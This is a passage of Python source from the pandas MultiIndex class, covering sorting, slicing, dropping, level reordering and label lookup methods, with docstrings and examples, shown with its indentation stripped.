copy=False,
)
if index:
result.index = self
return result
def to_flat_index(self) -> Index:
"""
Convert a MultiIndex to an Index of Tuples containing the level values.
Returns
-------
pd.Index
Index with the MultiIndex data represented in Tuples.
See Also
--------
MultiIndex.from_tuples : Convert flat index back to MultiIndex.
Notes
-----
This method will simply return the caller if called by anything other
than a MultiIndex.
Examples
--------
>>> index = pd.MultiIndex.from_product(
... [['foo', 'bar'], ['baz', 'qux']],
... names=['a', 'b'])
>>> index.to_flat_index()
Index([('foo', 'baz'), ('foo', 'qux'),
('bar', 'baz'), ('bar', 'qux')],
dtype='object')
"""
return Index(self._values, tupleize_cols=False)
@property
def _is_all_dates(self) -> bool:
return False
def is_lexsorted(self) -> bool:
warnings.warn(
"MultiIndex.is_lexsorted is deprecated as a public function, "
"users should use MultiIndex.is_monotonic_increasing instead.",
FutureWarning,
stacklevel=2,
)
return self._is_lexsorted()
def _is_lexsorted(self) -> bool:
"""
Return True if the codes are lexicographically sorted.
Returns
-------
bool
Examples
--------
In the below examples, the first level of the MultiIndex is sorted because
a<b<c, so there is no need to look at the next level.
>>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'e', 'f']]).is_lexsorted()
True
>>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'f', 'e']]).is_lexsorted()
True
In case there is a tie, the lexicographical sorting looks
at the next level of the MultiIndex.
>>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'b', 'c']]).is_lexsorted()
True
>>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'c', 'b']]).is_lexsorted()
False
>>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'],
... ['aa', 'bb', 'aa', 'bb']]).is_lexsorted()
True
>>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'],
... ['bb', 'aa', 'aa', 'bb']]).is_lexsorted()
False
"""
return self._lexsort_depth == self.nlevels
@property
def lexsort_depth(self) -> int:
warnings.warn(
"MultiIndex.is_lexsorted is deprecated as a public function, "
"users should use MultiIndex.is_monotonic_increasing instead.",
FutureWarning,
stacklevel=2,
)
return self._lexsort_depth
@cache_readonly
def _lexsort_depth(self) -> int:
"""
Compute and return the lexsort_depth, the number of levels of the
MultiIndex that are sorted lexically
Returns
-------
int
"""
if self.sortorder is not None:
return self.sortorder
return _lexsort_depth(self.codes, self.nlevels)
def _sort_levels_monotonic(self) -> MultiIndex:
"""
This is an *internal* function.
Create a new MultiIndex from the current to monotonically sorted
items IN the levels. This does not actually make the entire MultiIndex
monotonic, JUST the levels.
The resulting MultiIndex will have the same outward
appearance, meaning the same .values and ordering. It will also
be .equals() to the original.
Returns
-------
MultiIndex
Examples
--------
>>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']],
... codes=[[0, 0, 1, 1], [0, 1, 0, 1]])
>>> mi
MultiIndex([('a', 'bb'),
('a', 'aa'),
('b', 'bb'),
('b', 'aa')],
)
>>> mi.sort_values()
MultiIndex([('a', 'aa'),
('a', 'bb'),
('b', 'aa'),
('b', 'bb')],
)
"""
if self._is_lexsorted() and self.is_monotonic:
return self
new_levels = []
new_codes = []
for lev, level_codes in zip(self.levels, self.codes):
if not lev.is_monotonic:
try:
# indexer to reorder the levels
indexer = lev.argsort()
except TypeError:
pass
else:
lev = lev.take(indexer)
# indexer to reorder the level codes
indexer = ensure_platform_int(indexer)
ri = lib.get_reverse_indexer(indexer, len(indexer))
level_codes = algos.take_nd(ri, level_codes)
new_levels.append(lev)
new_codes.append(level_codes)
return MultiIndex(
new_levels,
new_codes,
names=self.names,
sortorder=self.sortorder,
verify_integrity=False,
)
def remove_unused_levels(self) -> MultiIndex:
"""
Create new MultiIndex from current that removes unused levels.
Unused level(s) means levels that are not expressed in the
labels. The resulting MultiIndex will have the same outward
appearance, meaning the same .values and ordering. It will
also be .equals() to the original.
Returns
-------
MultiIndex
Examples
--------
>>> mi = pd.MultiIndex.from_product([range(2), list('ab')])
>>> mi
MultiIndex([(0, 'a'),
(0, 'b'),
(1, 'a'),
(1, 'b')],
)
>>> mi[2:]
MultiIndex([(1, 'a'),
(1, 'b')],
)
The 0 from the first level is not represented
and can be removed
>>> mi2 = mi[2:].remove_unused_levels()
>>> mi2.levels
FrozenList([[1], ['a', 'b']])
"""
new_levels = []
new_codes = []
changed = False
for lev, level_codes in zip(self.levels, self.codes):
# Since few levels are typically unused, bincount() is more
# efficient than unique() - however it only accepts positive values
# (and drops order):
uniques = np.where(np.bincount(level_codes + 1) > 0)[0] - 1
has_na = int(len(uniques) and (uniques[0] == -1))
if len(uniques) != len(lev) + has_na:
if lev.isna().any() and len(uniques) == len(lev):
break
# We have unused levels
changed = True
# Recalculate uniques, now preserving order.
# Can easily be cythonized by exploiting the already existing
# "uniques" and stop parsing "level_codes" when all items
# are found:
uniques = algos.unique(level_codes)
if has_na:
na_idx = np.where(uniques == -1)[0]
# Just ensure that -1 is in first position:
uniques[[0, na_idx[0]]] = uniques[[na_idx[0], 0]]
# codes get mapped from uniques to 0:len(uniques)
# -1 (if present) is mapped to last position
code_mapping = np.zeros(len(lev) + has_na)
# ... and reassigned value -1:
code_mapping[uniques] = np.arange(len(uniques)) - has_na
level_codes = code_mapping[level_codes]
# new levels are simple
lev = lev.take(uniques[has_na:])
new_levels.append(lev)
new_codes.append(level_codes)
result = self.view()
if changed:
result._reset_identity()
result._set_levels(new_levels, validate=False)
result._set_codes(new_codes, validate=False)
return result
# --------------------------------------------------------------------
# Pickling Methods
def __reduce__(self):
"""Necessary for making this object picklable"""
d = {
"levels": list(self.levels),
"codes": list(self.codes),
"sortorder": self.sortorder,
"names": list(self.names),
}
return ibase._new_Index, (type(self), d), None
# --------------------------------------------------------------------
def __getitem__(self, key):
if is_scalar(key):
key = com.cast_scalar_indexer(key, warn_float=True)
retval = []
for lev, level_codes in zip(self.levels, self.codes):
if level_codes[key] == -1:
retval.append(np.nan)
else:
retval.append(lev[level_codes[key]])
return tuple(retval)
else:
# in general cannot be sure whether the result will be sorted
sortorder = None
if com.is_bool_indexer(key):
key = np.asarray(key, dtype=bool)
sortorder = self.sortorder
elif isinstance(key, slice):
if key.step is None or key.step > 0:
sortorder = self.sortorder
elif isinstance(key, Index):
key = np.asarray(key)
new_codes = [level_codes[key] for level_codes in self.codes]
return MultiIndex(
levels=self.levels,
codes=new_codes,
names=self.names,
sortorder=sortorder,
verify_integrity=False,
)
def _getitem_slice(self: MultiIndex, slobj: slice) -> MultiIndex:
"""
Fastpath for __getitem__ when we know we have a slice.
"""
sortorder = None
if slobj.step is None or slobj.step > 0:
sortorder = self.sortorder
new_codes = [level_codes[slobj] for level_codes in self.codes]
return type(self)(
levels=self.levels,
codes=new_codes,
names=self._names,
sortorder=sortorder,
verify_integrity=False,
)
@Appender(_index_shared_docs["take"] % _index_doc_kwargs)
def take(
self: MultiIndex,
indices,
axis: int = 0,
allow_fill: bool = True,
fill_value=None,
**kwargs,
) -> MultiIndex:
nv.validate_take((), kwargs)
indices = ensure_platform_int(indices)
# only fill if we are passing a non-None fill_value
allow_fill = self._maybe_disallow_fill(allow_fill, fill_value, indices)
na_value = -1
taken = [lab.take(indices) for lab in self.codes]
if allow_fill:
mask = indices == -1
if mask.any():
masked = []
for new_label in taken:
label_values = new_label
label_values[mask] = na_value
masked.append(np.asarray(label_values))
taken = masked
return MultiIndex(
levels=self.levels, codes=taken, names=self.names, verify_integrity=False
)
def append(self, other):
"""
Append a collection of Index options together
Parameters
----------
other : Index or list/tuple of indices
Returns
-------
appended : Index
"""
if not isinstance(other, (list, tuple)):
other = [other]
if all(
(isinstance(o, MultiIndex) and o.nlevels >= self.nlevels) for o in other
):
arrays = []
for i in range(self.nlevels):
label = self._get_level_values(i)
appended = [o._get_level_values(i) for o in other]
arrays.append(label.append(appended))
return MultiIndex.from_arrays(arrays, names=self.names)
to_concat = (self._values,) + tuple(k._values for k in other)
new_tuples = np.concatenate(to_concat)
# if all(isinstance(x, MultiIndex) for x in other):
try:
return MultiIndex.from_tuples(new_tuples, names=self.names)
except (TypeError, IndexError):
return Index._with_infer(new_tuples)
def argsort(self, *args, **kwargs) -> npt.NDArray[np.intp]:
return self._values.argsort(*args, **kwargs)
@Appender(_index_shared_docs["repeat"] % _index_doc_kwargs)
def repeat(self, repeats: int, axis=None) -> MultiIndex:
nv.validate_repeat((), {"axis": axis})
# error: Incompatible types in assignment (expression has type "ndarray",
# variable has type "int")
repeats = ensure_platform_int(repeats) # type: ignore[assignment]
return MultiIndex(
levels=self.levels,
codes=[
level_codes.view(np.ndarray).astype(np.intp).repeat(repeats)
for level_codes in self.codes
],
names=self.names,
sortorder=self.sortorder,
verify_integrity=False,
)
def drop(self, codes, level=None, errors="raise"):
"""
Make new MultiIndex with passed list of codes deleted
Parameters
----------
codes : array-like
Must be a list of tuples when level is not specified
level : int or level name, default None
errors : str, default 'raise'
Returns
-------
dropped : MultiIndex
"""
if level is not None:
return self._drop_from_level(codes, level, errors)
if not isinstance(codes, (np.ndarray, Index)):
try:
codes = com.index_labels_to_array(codes, dtype=np.dtype("object"))
except ValueError:
pass
inds = []
for level_codes in codes:
try:
loc = self.get_loc(level_codes)
# get_loc returns either an integer, a slice, or a boolean
# mask
if isinstance(loc, int):
inds.append(loc)
elif isinstance(loc, slice):
step = loc.step if loc.step is not None else 1
inds.extend(range(loc.start, loc.stop, step))
elif com.is_bool_indexer(loc):
if self._lexsort_depth == 0:
warnings.warn(
"dropping on a non-lexsorted multi-index "
"without a level parameter may impact performance.",
PerformanceWarning,
stacklevel=3,
)
loc = loc.nonzero()[0]
inds.extend(loc)
else:
msg = f"unsupported indexer of type {type(loc)}"
raise AssertionError(msg)
except KeyError:
if errors != "ignore":
raise
return self.delete(inds)
def _drop_from_level(self, codes, level, errors="raise") -> MultiIndex:
codes = com.index_labels_to_array(codes)
i = self._get_level_number(level)
index = self.levels[i]
values = index.get_indexer(codes)
# If nan should be dropped it will equal -1 here. We have to check which values
# are not nan and equal -1, this means they are missing in the index
nan_codes = isna(codes)
values[(np.equal(nan_codes, False)) & (values == -1)] = -2
if index.shape[0] == self.shape[0]:
values[np.equal(nan_codes, True)] = -2
not_found = codes[values == -2]
if len(not_found) != 0 and errors != "ignore":
raise KeyError(f"labels {not_found} not found in level")
mask = ~algos.isin(self.codes[i], values)
return self[mask]
def swaplevel(self, i=-2, j=-1) -> MultiIndex:
"""
Swap level i with level j.
Calling this method does not change the ordering of the values.
Parameters
----------
i : int, str, default -2
First level of index to be swapped. Can pass level name as string.
Type of parameters can be mixed.
j : int, str, default -1
Second level of index to be swapped. Can pass level name as string.
Type of parameters can be mixed.
Returns
-------
MultiIndex
A new MultiIndex.
See Also
--------
Series.swaplevel : Swap levels i and j in a MultiIndex.
Dataframe.swaplevel : Swap levels i and j in a MultiIndex on a
particular axis.
Examples
--------
>>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']],
... codes=[[0, 0, 1, 1], [0, 1, 0, 1]])
>>> mi
MultiIndex([('a', 'bb'),
('a', 'aa'),
('b', 'bb'),
('b', 'aa')],
)
>>> mi.swaplevel(0, 1)
MultiIndex([('bb', 'a'),
('aa', 'a'),
('bb', 'b'),
('aa', 'b')],
)
"""
new_levels = list(self.levels)
new_codes = list(self.codes)
new_names = list(self.names)
i = self._get_level_number(i)
j = self._get_level_number(j)
new_levels[i], new_levels[j] = new_levels[j], new_levels[i]
new_codes[i], new_codes[j] = new_codes[j], new_codes[i]
new_names[i], new_names[j] = new_names[j], new_names[i]
return MultiIndex(
levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False
)
def reorder_levels(self, order) -> MultiIndex:
"""
Rearrange levels using input order. May not drop or duplicate levels.
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
Returns
-------
MultiIndex
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([[1, 2], [3, 4]], names=['x', 'y'])
>>> mi
MultiIndex([(1, 3),
(2, 4)],
names=['x', 'y'])
>>> mi.reorder_levels(order=[1, 0])
MultiIndex([(3, 1),
(4, 2)],
names=['y', 'x'])
>>> mi.reorder_levels(order=['y', 'x'])
MultiIndex([(3, 1),
(4, 2)],
names=['y', 'x'])
"""
order = [self._get_level_number(i) for i in order]
if len(order) != self.nlevels:
raise AssertionError(
f"Length of order must be same as number of levels ({self.nlevels}), "
f"got {len(order)}"
)
new_levels = [self.levels[i] for i in order]
new_codes = [self.codes[i] for i in order]
new_names = [self.names[i] for i in order]
return MultiIndex(
levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False
)
def _get_codes_for_sorting(self) -> list[Categorical]:
"""
we are categorizing our codes by using the
available categories (all, not just observed)
excluding any missing ones (-1); this is in preparation
for sorting, where we need to disambiguate that -1 is not
a valid valid
"""
def cats(level_codes):
return np.arange(
np.array(level_codes).max() + 1 if len(level_codes) else 0,
dtype=level_codes.dtype,
)
return [
Categorical.from_codes(level_codes, cats(level_codes), ordered=True)
for level_codes in self.codes
]
def sortlevel(
self, level=0, ascending: bool = True, sort_remaining: bool = True
) -> tuple[MultiIndex, npt.NDArray[np.intp]]:
"""
Sort MultiIndex at the requested level.
The result will respect the original ordering of the associated
factor at that level.
Parameters
----------
level : list-like, int or str, default 0
If a string is given, must be a name of the level.
If list-like must be names or ints of levels.
ascending : bool, default True
False to sort in descending order.
Can also be a list to specify a directed ordering.
sort_remaining : sort by the remaining levels after level
Returns
-------
sorted_index : pd.MultiIndex
Resulting index.
indexer : np.ndarray[np.intp]
Indices of output values in original index.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([[0, 0], [2, 1]])
>>> mi
MultiIndex([(0, 2),
(0, 1)],
)
>>> mi.sortlevel()
(MultiIndex([(0, 1),
(0, 2)],
), array([1, 0]))
>>> mi.sortlevel(sort_remaining=False)
(MultiIndex([(0, 2),
(0, 1)],
), array([0, 1]))
>>> mi.sortlevel(1)
(MultiIndex([(0, 1),
(0, 2)],
), array([1, 0]))
>>> mi.sortlevel(1, ascending=False)
(MultiIndex([(0, 2),
(0, 1)],
), array([0, 1]))
"""
if isinstance(level, (str, int)):
level = [level]
level = [self._get_level_number(lev) for lev in level]
sortorder = None
# we have a directed ordering via ascending
if isinstance(ascending, list):
if not len(level) == len(ascending):
raise ValueError("level must have same length as ascending")
indexer = lexsort_indexer(
[self.codes[lev] for lev in level], orders=ascending
)
# level ordering
else:
codes = list(self.codes)
shape = list(self.levshape)
# partition codes and shape
primary = tuple(codes[lev] for lev in level)
primshp = tuple(shape[lev] for lev in level)
# Reverse sorted to retain the order of
# smaller indices that needs to be removed
for lev in sorted(level, reverse=True):
codes.pop(lev)
shape.pop(lev)
if sort_remaining:
primary += primary + tuple(codes)
primshp += primshp + tuple(shape)
else:
sortorder = level[0]
indexer = indexer_from_factorized(primary, primshp, compress=False)
if not ascending:
indexer = indexer[::-1]
indexer = ensure_platform_int(indexer)
new_codes = [level_codes.take(indexer) for level_codes in self.codes]
new_index = MultiIndex(
codes=new_codes,
levels=self.levels,
names=self.names,
sortorder=sortorder,
verify_integrity=False,
)
return new_index, indexer
def _wrap_reindex_result(self, target, indexer, preserve_names: bool):
if not isinstance(target, MultiIndex):
if indexer is None:
target = self
elif (indexer >= 0).all():
target = self.take(indexer)
else:
try:
target = MultiIndex.from_tuples(target)
except TypeError:
# not all tuples, see test_constructor_dict_multiindex_reindex_flat
return target
target = self._maybe_preserve_names(target, preserve_names)
return target
def _maybe_preserve_names(self, target: Index, preserve_names: bool) -> Index:
if (
preserve_names
and target.nlevels == self.nlevels
and target.names != self.names
):
target = target.copy(deep=False)
target.names = self.names
return target
# --------------------------------------------------------------------
# Indexing Methods
def _check_indexing_error(self, key) -> None:
if not is_hashable(key) or is_iterator(key):
# We allow tuples if they are hashable, whereas other Index
# subclasses require scalar.
# We have to explicitly exclude generators, as these are hashable.
raise InvalidIndexError(key)
@cache_readonly
def _should_fallback_to_positional(self) -> bool:
"""
Should integer key(s) be treated as positional?
"""
# GH#33355
return self.levels[0]._should_fallback_to_positional
def _get_values_for_loc(self, series: Series, loc, key):
"""
Do a positional lookup on the given Series, returning either a scalar
or a Series.
Assumes that `series.index is self`
"""
new_values = series._values[loc]
if is_scalar(loc):
return new_values
if len(new_values) == 1 and not self.nlevels > 1:
# If more than one level left, we can not return a scalar
return new_values[0]
new_index = self[loc]
new_index = maybe_droplevels(new_index, key)
new_ser = series._constructor(new_values, index=new_index, name=series.name)
return new_ser.__finalize__(series)
def _get_indexer_strict(
self, key, axis_name: str
) -> tuple[Index, npt.NDArray[np.intp]]:
keyarr = key
if not isinstance(keyarr, Index):
keyarr = com.asarray_tuplesafe(keyarr)
if len(keyarr) and not isinstance(keyarr[0], tuple):
indexer = self._get_indexer_level_0(keyarr)
self._raise_if_missing(key, indexer, axis_name)
return self[indexer], indexer
return super()._get_indexer_strict(key, axis_name)
def _raise_if_missing(self, key, indexer, axis_name: str) -> None:
keyarr = key
if not isinstance(key, Index):
keyarr = com.asarray_tuplesafe(key)
if len(keyarr) and not isinstance(keyarr[0], tuple):
# i.e. same condition for special case in MultiIndex._get_indexer_strict
mask = indexer == -1
if mask.any():
check = self.levels[0].get_indexer(keyarr)
cmask = check == -1
if cmask.any():
raise KeyError(f"{keyarr[cmask]} not in index")
# We get here when levels still contain values which are not
# actually in Index anymore
raise KeyError(f"{keyarr} not in index")
else:
return super()._raise_if_missing(key, indexer, axis_name)
def _get_indexer_level_0(self, target) -> npt.NDArray[np.intp]:
"""
Optimized equivalent to `self.get_level_values(0).get_indexer_for(target)`.
"""
lev = self.levels[0]
codes = self._codes[0]
cat = Categorical.from_codes(codes=codes, categories=lev)
ci = Index(cat)
return ci.get_indexer_for(target)
def get_slice_bound(
self, label: Hashable | Sequence[Hashable], side: str, kind=lib.no_default
) -> int:
"""
For an ordered MultiIndex, compute slice bound
that corresponds to given label.
Returns leftmost (one-past-the-rightmost if `side=='right') position
of given label.
Parameters
----------
label : object or tuple of objects
side : {'left', 'right'}
kind : {'loc', 'getitem', None}
.. deprecated:: 1.4.0
Returns
-------
int
Index of label.
Notes
-----
This method only works if level 0 index of the MultiIndex is lexsorted.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abbc'), list('gefd')])
Get the locations from the leftmost 'b' in the first level
until the end of the multiindex:
>>> mi.get_slice_bound('b', side="left")
1
Like above, but if you get the locations from the rightmost
'b' in the first level and 'f' in the second level:
>>> mi.get_slice_bound(('b','f'), side="right")
3
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
"""
self._deprecated_arg(kind, "kind", "get_slice_bound")
if not isinstance(label, tuple):
label = (label,)
return self._partial_tup_index(label, side=side)
def slice_locs(
self, start=None, end=None, step=None, kind=lib.no_default
) -> tuple[int, int]:
"""
For an ordered MultiIndex, compute the slice locations for input
labels.
The input labels can be tuples representing partial levels, e.g. for a
MultiIndex with 3 levels, you can pass a single value (corresponding to
the first level), or a 1-, 2-, or 3-tuple.
Parameters
----------
start : label or tuple, default None
If None, defaults to the beginning
end : label or tuple
If None, defaults to the end
step : int or None
Slice step
kind : string, optional, defaults None
.. deprecated:: 1.4.0
Returns
-------
(start, end) : (int, int)
Notes
-----
This method only works if the MultiIndex is properly lexsorted. So,
if only the first 2 levels of a 3-level MultiIndex are lexsorted,
you can only pass two levels to ``.slice_locs``.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abbd'), list('deff')],
... names=['A', 'B'])
Get the slice locations from the beginning of 'b' in the first level
until the end of the multiindex:
>>> mi.slice_locs(start='b')
(1, 4)
Like above, but stop at the end of 'b' in the first level and 'f' in
the second level:
>>> mi.slice_locs(start='b', end=('b', 'f'))
(1, 3)
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
"""
self._deprecated_arg(kind, "kind", "slice_locs")
# This function adds nothing to its parent implementation (the magic
# happens in get_slice_bound method), but it adds meaningful doc.
return super().slice_locs(start, end, step)
def _partial_tup_index(self, tup: tuple, side="left"):
if len(tup) > self._lexsort_depth:
raise UnsortedIndexError(
f"Key length ({len(tup)}) was greater than MultiIndex lexsort depth "
f"({self._lexsort_depth})"
)
n = len(tup)
start, end = 0, len(self)
zipped = zip(tup, self.levels, self.codes)
for k, (lab, lev, level_codes) in enumerate(zipped):
section = level_codes[start:end]
if lab not in lev and not isna(lab):
# short circuit
try:
loc = lev.searchsorted(lab, side=side)
except TypeError as err:
# non-comparable e.g. test_slice_locs_with_type_mismatch
raise TypeError(f"Level type mismatch: {lab}") from err
if not is_integer(loc):
# non-comparable level, e.g. test_groupby_example
raise TypeError(f"Level type mismatch: {lab}")
if side == "right" and loc >= 0:
loc -= 1
return start + section.searchsorted(loc, side=side)
idx = self._get_loc_single_level_index(lev, lab)
if isinstance(idx, slice) and k < n - 1:
# Get start and end value from slice, necessary when a non-integer
# interval is given as input GH#37707
start = idx.start
end = idx.stop
elif k < n - 1:
end = start + section.searchsorted(idx, side="right")
start = start + section.searchsorted(idx, side="left")
elif isinstance(idx, slice):
idx = idx.start
return start + section.searchsorted(idx, side=side)
else:
return start + section.searchsorted(idx, side=side)
def _get_loc_single_level_index(self, level_index: Index, key: Hashable) -> int:
"""
If key is NA value, location of index unify as -1.
Parameters
----------
level_index: Index
key : label
Returns
-------
loc : int
If key is NA value, loc is -1
Else, location of key in index.
See Also
--------
Index.get_loc : The get_loc method for (single-level) index.
"""
if is_scalar(key) and isna(key):
return -1
else:
return level_index.get_loc(key)
def get_loc(self, key, method=None):
"""
Get location for a label or a tuple of labels.
The location is returned as an integer/slice or boolean
mask.
Parameters
----------
key : label or tuple of labels (one for each level)
method : None
Returns
-------
loc : int, slice object or boolean mask
If the key is past the lexsort depth, the return may be a
boolean mask array, otherwise it is always a slice or int.
See Also
--------
Index.get_loc : The get_loc method for (single-level) index.
MultiIndex.slice_locs : Get slice location given start label(s) and
end label(s).
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
Notes
-----
The key cannot be a slice, list of same-level labels, a boolean mask,
or a sequence of such. If you want to use those, use
:meth:`MultiIndex.get_locs` instead.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')])
>>> mi.get_loc('b')
slice(1, 3, None)
>>> mi.get_loc(('b', 'e'))
1
"""
if method is not None:
raise NotImplementedError(
"only the default get_loc method is "
"currently supported for MultiIndex"
)
hash(key)
def _maybe_to_slice(loc):
"""convert integer indexer to boolean mask or slice if possible"""
if not isinstance(loc, np.ndarray) or loc.dtype != np.intp:
return loc
loc = lib.maybe_indices_to_slice(loc, len(self))
if isinstance(loc, slice):
return loc
mask = np.empty(len(self), dtype="bool")
mask.fill(False)
mask[loc] = True
return mask
if not isinstance(key, tuple):
loc = self._get_level_indexer(key, level=0)
return _maybe_to_slice(loc)
keylen = len(key)
if self.nlevels < keylen:
raise KeyError(
f"Key length ({keylen}) exceeds index depth ({self.nlevels})"
)
if keylen == self.nlevels and self.is_unique:
try:
return self._engine.get_loc(key)
except TypeError:
# e.g. test_partial_slicing_with_multiindex partial string slicing
loc, _ = self.get_loc_level(key, list(range(self.nlevels)))
return loc
# -- partial selection or non-unique index
# break the key into 2 parts based on the lexsort_depth of the index;
# the first part returns a continuous slice of the index; the 2nd part
# needs linear search within the slice
i = self._lexsort_depth
lead_key, follow_key = key[:i], key[i:]
if not lead_key:
start = 0
stop = len(self)
else:
try:
start, stop = self.slice_locs(lead_key, lead_key)
except TypeError as err:
# e.g. test_groupby_example key = ((0, 0, 1, 2), "new_col")
# when self has 5 integer levels
raise KeyError(key) from err
if start == stop:
raise KeyError(key)
if not follow_key:
return slice(start, stop)
warnings.warn(
"indexing past lexsort depth may impact performance.",
PerformanceWarning,
stacklevel=10,
)
loc = np.arange(start, stop, dtype=np.intp)
for i, k in enumerate(follow_key, len(lead_key)):
mask = self.codes[i][loc] == self._get_loc_single_level_index(
self.levels[i], k
)
if not mask.all():
loc = loc[mask]
if not len(loc):
raise KeyError(key)
return _maybe_to_slice(loc) if len(loc) != stop - start else slice(start, stop)
def get_loc_level(self, key, level=0, drop_level: bool = True):
"""
Get location and sliced index for requested label(s)/level(s).
Parameters
----------
key : label or sequence of labels
level : int/level name or list thereof, optional
drop_level : bool, default True
If ``False``, the resulting index will not drop any level.
Returns
-------
loc : A 2-tuple where the elements are:
Element 0: int, slice object or boolean array
Element 1: The resulting sliced multiindex/index. If the key
contains all levels, this will be ``None``.
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.get_locs : Get location for a label/slice/list/mask or a
sequence of such.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')],
... names=['A', 'B'])
>>> mi.get_loc_level('b')
(slice(1, 3, None), Index(['e', 'f'], dtype='object', name='B'))
>>> mi.get_loc_level('e', level='B')
(array([False, True, False]), Index(['b'], dtype='object', name='A'))
>>> mi.get_loc_level(['b', 'e'])
(1, None)
"""
if not isinstance(level, (list, tuple)):
level = self._get_level_number(level)
else:
level = [self._get_level_number(lev) for lev in level]
loc, mi = self._get_loc_level(key, level=level)
if not drop_level:
if lib.is_integer(loc):
mi = self[loc : loc + 1]
else:
mi = self[loc]
return loc, mi
def _get_loc_level(self, key, level: int | list[int] = 0):
"""
get_loc_level but with `level` known to be positional, not name-based.
"""
# different name to distinguish from maybe_droplevels
def maybe_mi_droplevels(indexer, levels):
new_index = self[indexer]
for i in sorted(levels, reverse=True):
new_index = new_index._drop_level_numbers([i])
return new_index
if isinstance(level, (tuple, list)):
if len(key) != len(level):
raise AssertionError(
"Key for location must have same length as number of levels"
)
result = None
for lev, k in zip(level, key):
loc, new_index = self._get_loc_level(k, level=lev)
if isinstance(loc, slice):
mask = np.zeros(len(self), dtype=bool)
mask[loc] = True
loc = mask
result = loc if result is None else result & loc
try:
# FIXME: we should be only dropping levels on which we are
# scalar-indexing
mi = maybe_mi_droplevels(result, level)
except ValueError:
# droplevel failed because we tried to drop all levels,
# i.e. len(level) == self.nlevels
mi = self[result]
return result, mi
# kludge for #1796
if isinstance(key, list):
key = tuple(key)
if isinstance(key, tuple) and level == 0:
try:
# Check if this tuple is a single key in our first level
if key in self.levels[0]:
indexer = self._get_level_indexer(key, level=level)
new_index = maybe_mi_droplevels(indexer, [0])
return indexer, new_index
except (TypeError, InvalidIndexError):
pass
if not any(isinstance(k, slice) for k in key):
if len(key) == self.nlevels and self.is_unique:
# Complete key in unique index -> standard get_loc
try:
return (self._engine.get_loc(key), None)
except KeyError as err:
raise KeyError(key) from err
except TypeError:
# e.g. partial string indexing
# test_partial_string_timestamp_multiindex
pass
# partial selection
indexer = self.get_loc(key)
ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)]
if len(ilevels) == self.nlevels:
if is_integer(indexer):
# we are dropping all levels
return indexer, None
# TODO: in some cases we still need to drop some levels,
# e.g. test_multiindex_perf_warn
# test_partial_string_timestamp_multiindex
ilevels = [
i
for i in range(len(key))
if (
not isinstance(key[i], str)
or not self.levels[i]._supports_partial_string_indexing
)
and key[i] != slice(None, None)
]
if len(ilevels) == self.nlevels:
# TODO: why?
ilevels = []
return indexer, maybe_mi_droplevels(indexer, ilevels)
else:
indexer = None
for i, k in enumerate(key):
if not isinstance(k, slice):
loc_level = self._get_level_indexer(k, level=i)
if isinstance(loc_level, slice):
if com.is_null_slice(loc_level) or com.is_full_slice(
loc_level, len(self)
):
# everything
continue
else:
# e.g. test_xs_IndexSlice_argument_not_implemented
k_index = np.zeros(len(self), dtype=bool)
k_index[loc_level] = True
else:
k_index = loc_level
elif com.is_null_slice(k):
# taking everything, does not affect `indexer` below
continue
else:
# FIXME: this message can be inaccurate, e.g.
# test_series_varied_multiindex_alignment
raise TypeError(f"Expected label or tuple of labels, got {key}")
if indexer is None:
indexer = k_index
else:
indexer &= k_index
if indexer is None:
indexer = slice(None, None)
ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)]
return indexer, maybe_mi_droplevels(indexer, ilevels)
else:
indexer = self._get_level_indexer(key, level=level)
if (
isinstance(key, str)
and self.levels[level]._supports_partial_string_indexing
):
# check to see if we did an exact lookup vs sliced
check = self.levels[level].get_loc(key)
if not is_integer(check):
# e.g. test_partial_string_timestamp_multiindex
return indexer, self[indexer]
return indexer, maybe_mi_droplevels(indexer, [level])
def _get_level_indexer(
self, key, level: int = 0, indexer: Int64Index | None = None
):
# `level` kwarg is _always_ positional, never name
# return an indexer, boolean array or a slice showing where the key is
# in the totality of values
# if the indexer is provided, then use this
level_index = self.levels[level]
level_codes = self.codes[level]
def convert_indexer(start, stop, step, indexer=indexer, codes=level_codes):
# given the inputs and the codes/indexer, compute an indexer set
# if we have a provided indexer, then this need not consider
# the entire labels set
if step is not None and step < 0:
# Switch elements for negative step size
start, stop = stop - 1, start - 1
r = np.arange(start, stop, step)
if indexer is not None and len(indexer) != len(codes):
# we have an indexer which maps the locations in the labels
# that we have already selected (and is not an indexer for the
# entire set) otherwise this is wasteful so we only need to
# examine locations that are in this set the only magic here is
# that the result are the mappings to the set that we have
# selected
from pandas import Series
mapper = Series(indexer)
indexer = codes.take(ensure_platform_int(indexer))
result = Series(Index(indexer).isin(r).nonzero()[0])
m = result.map(mapper)
# error: Incompatible types in assignment (expression has type
# "ndarray", variable has type "Series")
m = np.asarray(m) # type: ignore[assignment]
else:
# error: Incompatible types in assignment (expression has type
# "ndarray", variable has type "Series")
m = np.zeros(len(codes), dtype=bool) # type: ignore[assignment]
m[np.in1d(codes, r, assume_unique=Index(codes).is_unique)] = True
return m
if isinstance(key, slice):
# handle a slice, returning a slice if we can
# otherwise a boolean indexer
try:
